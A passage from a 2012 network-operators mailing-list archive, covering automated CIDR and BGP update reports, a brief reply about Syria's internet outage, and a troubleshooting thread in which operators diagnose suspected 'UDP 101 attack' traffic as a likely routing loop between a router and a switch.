72.35.232.0/21 AS30097 NUWAVE - NuWave 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.115.124.0/23 AS46540 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. 91.102.192.0/21 AS15879 ASN-IS IS Interned Services BV 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. 
172.120.16.0/21 AS19891 BML-AS Bill Me Later, Inc 192.0.0.0/24 AS14745 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. 200.6.49.0/24 AS23148 TERREMARK Terremark 200.24.73.0/24 AS26061 Equant Colombia 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda 200.58.248.0/21 AS27849 200.75.184.0/21 AS14754 Telgua 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. 202.58.113.0/24 AS19161 202.83.120.0/21 AS37972 202.83.124.0/24 AS37972 202.83.125.0/24 AS37972 202.83.126.0/24 AS37972 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. 
202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd 203.142.219.0/24 AS45149 204.9.116.0/22 AS30097 NUWAVE - NuWave 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications 204.10.92.0/23 AS30097 NUWAVE - NuWave 204.10.94.0/23 AS30097 NUWAVE - NuWave 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 
208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. 216.21.160.0/20 AS27876 American Data Networks 216.155.176.0/20 AS16706 ORTHONE - NORTHEAST ORTHOPAEDIC CLINIC, LLP 216.194.160.0/20 AS27876 American Data Networks Please see http://www.cidr-report.org for the full report ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From cidr-report at potaroo.net Fri Jul 20 17:04:32 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 20 Jul 2012 22:04:32 GMT Subject: BGP Update Report Message-ID: <201207202204.q6KM4W3M041420@wattle.apnic.net> BGP Update Report Interval: 14-Jul-12 -to- 16-Jul-12 (2 days) Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASN Upds % Upds/Pfx AS-Name 1 - AS17813 8441 1.1% 62.5 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 2 - AS8402 7458 0.9% 4.3 -- CORBINA-AS OJSC "Vimpelcom" 3 - AS6389 6799 0.8% 2.0 -- BELLSOUTH-NET-BLK - BellSouth.net Inc. 4 - AS7029 4412 0.6% 1.3 -- WINDSTREAM - Windstream Communications Inc 5 - AS28573 4308 0.5% 2.1 -- NET Servicos de Comunicao S.A. 6 - AS47931 4294 0.5% 34.9 -- ALENETWORK A.L.E. COM NETWORK S.R.L 7 - AS9829 4175 0.5% 3.2 -- BSNL-NIB National Internet Backbone 8 - AS22561 4072 0.5% 4.0 -- DIGITAL-TELEPORT - Digital Teleport Inc. 9 - AS18566 3937 0.5% 1.9 -- COVAD - Covad Communications Co. 
10 - AS1785 3867 0.5% 2.0 -- AS-PAETEC-NET - PaeTec Communications, Inc. 11 - AS27738 3789 0.5% 6.9 -- Ecuadortelecom S.A. 12 - AS8151 3457 0.4% 2.4 -- Uninet S.A. de C.V. 13 - AS17974 3355 0.4% 1.5 -- TELKOMNET-AS2-AP PT Telekomunikasi Indonesia 14 - AS13118 3240 0.4% 67.5 -- ASN-YARTELECOM OJSC Rostelecom 15 - AS24560 3049 0.4% 2.9 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 16 - AS20115 2973 0.4% 1.8 -- CHARTER-NET-HKY-NC - Charter Communications 17 - AS10620 2846 0.4% 1.4 -- Telmex Colombia S.A. 18 - AS4766 2764 0.3% 1.0 -- KIXS-AS-KR Korea Telecom 19 - AS8452 2604 0.3% 2.2 -- TE-AS TE-AS 20 - AS3356 2474 0.3% 2.2 -- LEVEL3 Level 3 Communications TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASN Upds % Upds/Pfx AS-Name 1 - AS49745 815 0.1% 815.0 -- ESIH-AS EnergoStroyInvest-Holding JSC 2 - AS43348 1154 0.1% 577.0 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 3 - AS55665 182 0.0% 182.0 -- STMI-AS-ID PT Sampoerna Telemedia Indonesia 4 - AS33524 149 0.0% 149.0 -- BT-ROC1-AS1 - BlueTie, Inc. 5 - AS3 146 0.0% 759.0 -- J2-GLOBAL-IRELAND j2 Global Ireland Ltd 6 - AS58249 282 0.0% 141.0 -- SKYDRAGONCOMPANYWITHLIMITEDLIABILITY Sky Dragon Company With Limited Liability 7 - AS49072 138 0.0% 138.0 -- APSUARA-AS TCA Apsuara Ltd. 8 - AS37026 395 0.1% 131.7 -- SALT-ASN 9 - AS42806 125 0.0% 125.0 -- TELECOM-AS Telecom Georgia 10 - AS53189 1507 0.2% 115.9 -- 11 - AS42602 112 0.0% 112.0 -- GRANBANK-AS GRAN branch of Joint Stock Commercial Bank INVESTBANK Open-end JSC AS 12 - AS34349 111 0.0% 111.0 -- KUNTSEVONET-AS ZAO Networks Project AS 13 - AS29126 94 0.0% 94.0 -- DATIQ-AS Datiq B.V. 14 - AS54722 92 0.0% 92.0 -- BMOS - Museum of Science 15 - AS29398 83 0.0% 83.0 -- PETROBALTIC "Petrobaltic" S.A. 16 - AS4 308 0.0% 339.0 -- COMUNICALO DE MEXICO S.A. 
DE C.V 17 - AS50433 74 0.0% 74.0 -- TSPU-AS Tomsk State Pedagogical University 18 - AS10702 2328 0.3% 70.5 -- INL-AS - Idaho National Laboratory 19 - AS19406 752 0.1% 68.4 -- TWRS-MA - Towerstream I, Inc. 20 - AS13118 3240 0.4% 67.5 -- ASN-YARTELECOM OJSC Rostelecom TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 109.161.64.0/19 3149 0.4% AS13118 -- ASN-YARTELECOM OJSC Rostelecom 2 - 98.125.192.0/22 2000 0.2% AS22561 -- DIGITAL-TELEPORT - Digital Teleport Inc. 3 - 59.176.0.0/14 1978 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 4 - 59.177.0.0/16 1521 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 5 - 111.125.126.0/24 1519 0.2% AS17639 -- COMCLARK-AS ComClark Network & Technology Corp. 6 - 59.177.0.0/18 1067 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 7 - 59.177.48.0/20 1004 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 8 - 114.143.220.0/24 957 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 9 - 202.56.215.0/24 954 0.1% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 10 - 123.252.208.0/24 852 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 11 - 139.139.19.0/24 837 0.1% AS1562 -- DNIC-ASBLK-01550-01601 - DoD Network Information Center 12 - 194.190.10.0/24 815 0.1% AS49745 -- ESIH-AS EnergoStroyInvest-Holding JSC 13 - 194.63.9.0/24 810 0.1% AS1273 -- CW Cable and Wireless Worldwide plc 14 - 69.38.178.0/24 732 0.1% AS19406 -- TWRS-MA - Towerstream I, Inc. 15 - 59.177.64.0/18 624 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 16 - 94.131.0.0/16 577 0.1% AS43348 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 17 - 94.130.0.0/16 577 0.1% AS43348 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 18 - 59.177.0.0/19 561 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 
19 - 65.82.30.0/24 536 0.1% AS6197 -- BATI-ATL - BellSouth Network Solutions, Inc
20 - 204.134.161.0/24 530 0.1% AS10702 -- INL-AS - Idaho National Laboratory

Details at http://bgpupdates.potaroo.net
------------------------------------
Copies of this report are mailed to:
nanog at nanog.org
eof-list at ripe.net
apops at apops.net
routing-wg at ripe.net
afnog at afnog.org

From graham at apolix.co.za Sat Jul 21 03:06:41 2012
From: graham at apolix.co.za (Graham Beneke)
Date: Sat, 21 Jul 2012 10:06:41 +0200
Subject: Hearing Syria internet cut
In-Reply-To:
References:
Message-ID: <500A6311.9010706@apolix.co.za>

On 21/07/2012 00:08, James Smith wrote:
> I'm curious to know what method people use to monitor the changes in the BGP system? Any recommendations?

http://bgpmon.net/

> -----Original Message-----
> From: Andree Toonk
> Date: Fri, 20 Jul 2012 06:21:21
> To:
> Cc:
> Subject: Re: Hearing Syria internet cut
>
>
> .-- My secret spy satellite informs me that at 12-07-19 10:00 PM George
> Bonser wrote:
>> Can anyone confirm?
>
> Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP
> tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19).

-- 
Graham Beneke

From sh.vahabzadeh at gmail.com Sat Jul 21 09:50:32 2012
From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh)
Date: Sat, 21 Jul 2012 19:20:32 +0430
Subject: Attack on UDP 101
Message-ID:

Hi there,
Does anybody know of any report about an attack on UDP Port 101 which makes Layer 3 Loops?
This is an example sniff:

Source IP Address is : 76.164.199.86
Source port: 62946 Destination port: 101
2012-07-21 11:11:09.646757

Thanks

-- 
Regards,
Shahab Vahabzadeh, Network Engineer and System Administrator

Cell Phone: +1 (415) 871 0742
PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90

From morrowc.lists at gmail.com Sat Jul 21 12:47:31 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Sat, 21 Jul 2012 13:47:31 -0400
Subject: Attack on UDP 101
In-Reply-To:
References:
Message-ID:

On Sat, Jul 21, 2012 at 10:50 AM, Shahab Vahabzadeh wrote:
> 76.164.199.86

is this host perhaps a bcast/network address or routed oddly at the destination? (/32 route to something that is redirecting to another place? or redirecting back toward 0/0?)

also:
versaweb should fix their rwhois server:
Found a referral to rwhois.versaweb.com:4321.

PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so' - /usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin' - /usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin: cannot open shared object file: No such file or directory in Unknown on line 0
X-Powered-By: PHP/5.3.8
Set-Cookie: UBERSID=2d6ba57f7921e7694c87b3dfe04eb745; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8

From sh.vahabzadeh at gmail.com Sat Jul 21 12:57:38 2012
From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh)
Date: Sat, 21 Jul 2012 22:27:38 +0430
Subject: Attack on UDP 101
In-Reply-To:
References:
Message-ID:

Dear Christopher,
There is no route for this host, but my users connect to this router via virtual-template interface, and
on the uplink interface of the same router near 300Mbps of traffic is automatically being generated (output) and it's looping on the same interface (no broadcast on other interfaces).
I sniffed the traffic at that time with tcpdump and I think there were lots of packets like this; I thought it's an attack from one of the users because my netflow analyser does not show any record with this IP Address.
Do you have any idea?

Thanks

On Sat, Jul 21, 2012 at 10:17 PM, Christopher Morrow <morrowc.lists at gmail.com> wrote:
> On Sat, Jul 21, 2012 at 10:50 AM, Shahab Vahabzadeh
> wrote:
> > 76.164.199.86
>
> is this host perhaps a bcast/network address or routed oddly at the
> destination? (/32 route to something that is redirecting to another
> place? or redirecting back toward 0/0?)
>
> also:
> versaweb should fix their rwhois server:
> Found a referral to rwhois.versaweb.com:4321.
>
> PHP Warning: PHP Startup: Unable to load dynamic library
> '/usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so' -
> /usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so:
> cannot open shared object file: No such file or directory in Unknown
> on line 0
> PHP Warning: PHP Startup: Unable to load dynamic library
> '/usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin' -
> /usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin: cannot
> open shared object file: No such file or directory in Unknown on line
> 0
> X-Powered-By: PHP/5.3.8
> Set-Cookie: UBERSID=2d6ba57f7921e7694c87b3dfe04eb745; path=/
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma: no-cache
> Content-type: text/html; charset=UTF-8
>

-- 
Regards,
Shahab Vahabzadeh, Network Engineer and System Administrator

Cell Phone: +1 (415) 871 0742
PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90

From sfouant at shortestpathfirst.net Sat Jul 21 13:32:12 2012
From: sfouant at shortestpathfirst.net
(Stefan Fouant)
Date: Sat, 21 Jul 2012 14:32:12 -0400
Subject: Re: Attack on UDP 101
Message-ID:

Can you give us more information? What do you mean it is causing Layer 3 loops?

Stefan Fouant

Sent from my HTC on the Now Network from Sprint!

----- Reply message -----
From: "Shahab Vahabzadeh"
Date: Sat, Jul 21, 2012 10:50 am
Subject: Attack on UDP 101
To:

Hi there,
Does any body know any report about attack on UDP Port 101 which make Layer 3 Loops?
This is an example sniff:

Source IP Address is : 76.164.199.86
Source port: 62946 Destination port: 101
2012-07-21 11:11:09.646757

Thanks

-- 
Regards,
Shahab Vahabzadeh, Network Engineer and System Administrator

Cell Phone: +1 (415) 871 0742
PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90

From sh.vahabzadeh at gmail.com Sat Jul 21 13:41:05 2012
From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh)
Date: Sat, 21 Jul 2012 23:11:05 +0430
Subject: Attack on UDP 101
In-Reply-To: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com>
References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com>
Message-ID:

Dear Stefan,
I have a 7206VXR Router with this design:

int gig 0/1: directly connected to 3750 switch (uplink to internet)
int gig 0/2: vlan termination from PSTN centers
int virtual-template1: xdsl users

It's about 4 days that I see near 300Mbps outbound traffic on int gig0/1, and there is no such traffic on any of the router's interfaces, but the same traffic is seen on the 3750 peer interface.
I tried to run a monitor session on the 3750 and monitor port traffic, and I see that the packet is generated from a user and it's in a loop between the 3750 and 7206.
When I disconnect that user, I see that that packet is in a loop again; because of that I am sure it's making a loop, but I do not know whether the reason is those packets or not.

Thanks

On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant <sfouant at shortestpathfirst.net> wrote:
> Can you give us more information?
What do you mean it is causing Layer 3 > loops? > > Stefan Fouant > > Sent from my HTC on the Now Network from Sprint! > > > ----- Reply message ----- > From: "Shahab Vahabzadeh" > Date: Sat, Jul 21, 2012 10:50 am > Subject: Attack on UDP 101 > To: > > Hi there, > Does any body know any report about attack on UDP Port 101 which make Layer > 3 Loops? > This is an example sniff: > > Source IP Address is : 76.164.199.86 > Source port: 62946 Destination port: 101 > 2012-07-21 11:11:09.646757 > > Thanks > > -- > Regards, > Shahab Vahabzadeh, Network Engineer and System Administrator > > Cell Phone: +1 (415) 871 0742 > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > > > -- Regards, Shahab Vahabzadeh, Network Engineer and System Administrator Cell Phone: +1 (415) 871 0742 PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From swm at emanon.com Sat Jul 21 13:50:06 2012 From: swm at emanon.com (Scott Morris) Date: Sat, 21 Jul 2012 14:50:06 -0400 Subject: Attack on UDP 101 In-Reply-To: References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> Message-ID: <500AF9DE.6040102@emanon.com> A packet doesn't make a loop. A device would create that. So if you are sending the packet out, but something else is sending it back, I'd go take a look at where that's occurring on your devices. If you disconnected the user in question, then what else has either taken over that address, or what device is mistakenly sending things back? Something on your network is making a decision about it, you just need to figure out why. 
;) Scott On 7/21/12 2:41 PM, Shahab Vahabzadeh wrote: > Dear Stefan, > I have an 7206VXR Router with this design: > > int gig 0/1: directly connected to 3750 switch (uplink to internet) > int gig 0/2: vlan termination from PSTN centers > int virtual-template1: xdsl users > > Its about 4 days that I see near 300Mpbs outbound traffic in int gig0/1 > that there is no such a traffic in none of routers interface, but the same > traffic is seen in 3750 peer interface. > I try to run monitor session on 3750 and monitor port traffic which I see > that packet is generating from a user and its in a loop between 3750 and > 7206. > When I disconnect that user, I see that that packet is in loop again, > because of that I am sure its making a loop but I do not know the reseaon > is that packets or not. > > Thanks > > > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant < > sfouant at shortestpathfirst.net> wrote: > >> Can you give us more information? What do you mean it is causing Layer 3 >> loops? >> >> Stefan Fouant >> >> Sent from my HTC on the Now Network from Sprint! >> >> >> ----- Reply message ----- >> From: "Shahab Vahabzadeh" >> Date: Sat, Jul 21, 2012 10:50 am >> Subject: Attack on UDP 101 >> To: >> >> Hi there, >> Does any body know any report about attack on UDP Port 101 which make Layer >> 3 Loops? 
>> This is an example sniff: >> >> Source IP Address is : 76.164.199.86 >> Source port: 62946 Destination port: 101 >> 2012-07-21 11:11:09.646757 >> >> Thanks >> >> -- >> Regards, >> Shahab Vahabzadeh, Network Engineer and System Administrator >> >> Cell Phone: +1 (415) 871 0742 >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 >> >> >> > From morrowc.lists at gmail.com Sat Jul 21 14:03:54 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Sat, 21 Jul 2012 15:03:54 -0400 Subject: Attack on UDP 101 In-Reply-To: References: Message-ID: On Sat, Jul 21, 2012 at 1:57 PM, Shahab Vahabzadeh wrote: > Dear Christopher, > There is no route for this host, but my users connect to this router via $ p 76.164.199.86 PING 76.164.199.86 (76.164.199.86) 56(84) bytes of data. 64 bytes from 76.164.199.86: icmp_seq=1 ttl=250 time=89.9 ms seems like I see one from inside verizon-land... > virtual-template interface, and in the uplink interface of the same router > automatically near 300Mbps traffic is generating (output) and its looping in > the same interface (no broadcast in other interfaces). > I sniff the traffic on that time with tcpdump I think lots of packets like > this, I thought its an attack from one of users because my netflow analyser > does not show any record with this IP Address. > Do you have any idea? some screwball config on your router? or a case where 2 devices have differing ideas of where 0/0 is headed? "Hey, you should know where to send this... no, you should... no, you should.... oops! ttl-expired." > Thanks > > > On Sat, Jul 21, 2012 at 10:17 PM, Christopher Morrow > wrote: >> >> On Sat, Jul 21, 2012 at 10:50 AM, Shahab Vahabzadeh >> wrote: >> > 76.164.199.86 >> >> is this host perhaps a bcast/network address or routed oddly at the >> destination? (/32 route to something that is redirecting to another >> place? or redirecting back toward 0/0?) 
>>
>> also:
>> versaweb should fix their rwhois server:
>> Found a referral to rwhois.versaweb.com:4321.
>>
>> PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so' - /usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so: cannot open shared object file: No such file or directory in Unknown on line 0
>> PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin' - /usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin: cannot open shared object file: No such file or directory in Unknown on line 0
>> X-Powered-By: PHP/5.3.8
>> Set-Cookie: UBERSID=2d6ba57f7921e7694c87b3dfe04eb745; path=/
>> Expires: Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
>> Pragma: no-cache
>> Content-type: text/html; charset=UTF-8
>
>
> --
> Regards,
> Shahab Vahabzadeh, Network Engineer and System Administrator
>
> Cell Phone: +1 (415) 871 0742
> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
>

From morrowc.lists at gmail.com Sat Jul 21 14:08:04 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Sat, 21 Jul 2012 15:08:04 -0400
Subject: Attack on UDP 101
In-Reply-To:
References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com>
Message-ID:

On Sat, Jul 21, 2012 at 2:41 PM, Shahab Vahabzadeh wrote:
> Dear Stefan,
> I have a 7206VXR Router with this design:
>
> int gig 0/1: directly connected to 3750 switch (uplink to internet)
> int gig 0/2: vlan termination from PSTN centers
> int virtual-template1: xdsl users
>
> It's about 4 days that I see near 300Mbps outbound traffic in int gig0/1 that there is no such a traffic in none of routers interface, but the same traffic is seen in 3750 peer interface.
> I try to run monitor session on 3750 and monitor port traffic which I see that packet is generating from a user and it's in a loop between 3750 and 7206.

I suspect that the 7206 and 3750 both think the other guy has default... and with no more specific to follow the packet just pingpongs between the 2 devices. I would also suspect you see this for more than one destination :(

picking just one entry (last entry I see) from route-views.routeviews.org:
BGP routing table entry for 76.164.192.0/19, version 708055091
Paths: (35 available, best #31, table Default-IP-Routing-Table)
...
4436 6939 53340 36114
69.31.111.244 from 69.31.111.244 (69.31.111.244)
Origin IGP, metric 0, localpref 100, valid, external
Community: 4436:21216

all of 36114(versaweb) traffic would seem to head through 53340(vegasnap) on the way home, so... maybe something else is going on like you didn't accept transit routes (or send them or something else) from your transit? hard to say with as little info as we see here, but :)

> When I disconnect that user, I see that that packet is in loop again, because of that I am sure it's making a loop but I do not know the reason is that packets or not.
>
> Thanks
>
> On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant <sfouant at shortestpathfirst.net> wrote:
>
>> Can you give us more information? What do you mean it is causing Layer 3 loops?
>>
>> Stefan Fouant
>>
>> Sent from my HTC on the Now Network from Sprint!
>>
>> ----- Reply message -----
>> From: "Shahab Vahabzadeh"
>> Date: Sat, Jul 21, 2012 10:50 am
>> Subject: Attack on UDP 101
>> To:
>>
>> Hi there,
>> Does anybody know any report about attack on UDP Port 101 which make Layer 3 Loops?
>> This is an example sniff:
>>
>> Source IP Address is : 76.164.199.86
>> Source port: 62946 Destination port: 101
>> 2012-07-21 11:11:09.646757
>>
>> Thanks
>>
>> --
>> Regards,
>> Shahab Vahabzadeh, Network Engineer and System Administrator
>>
>> Cell Phone: +1 (415) 871 0742
>> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
>>
>
> --
> Regards,
> Shahab Vahabzadeh, Network Engineer and System Administrator
>
> Cell Phone: +1 (415) 871 0742
> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90

From sh.vahabzadeh at gmail.com Sat Jul 21 14:12:39 2012
From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh)
Date: Sat, 21 Jul 2012 23:42:39 +0430
Subject: Attack on UDP 101
In-Reply-To:
References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com>
Message-ID:

Can hardware problem make something happen?

On Sat, Jul 21, 2012 at 11:38 PM, Christopher Morrow <morrowc.lists at gmail.com> wrote:
> On Sat, Jul 21, 2012 at 2:41 PM, Shahab Vahabzadeh wrote:
> > Dear Stefan,
> > I have a 7206VXR Router with this design:
> >
> > int gig 0/1: directly connected to 3750 switch (uplink to internet)
> > int gig 0/2: vlan termination from PSTN centers
> > int virtual-template1: xdsl users
> >
> > It's about 4 days that I see near 300Mbps outbound traffic in int gig0/1 that there is no such a traffic in none of routers interface, but the same traffic is seen in 3750 peer interface.
> > I try to run monitor session on 3750 and monitor port traffic which I see that packet is generating from a user and it's in a loop between 3750 and 7206.
>
> I suspect that the 7206 and 3750 both think the other guy has default... and with no more specific to follow the packet just pingpongs between the 2 devices. I would also suspect you see this for more than one destination :(
>
> picking just one entry (last entry I see) from route-views.routeviews.org:
> BGP routing table entry for 76.164.192.0/19, version 708055091
> Paths: (35 available, best #31, table Default-IP-Routing-Table)
> ...
> 4436 6939 53340 36114
> 69.31.111.244 from 69.31.111.244 (69.31.111.244)
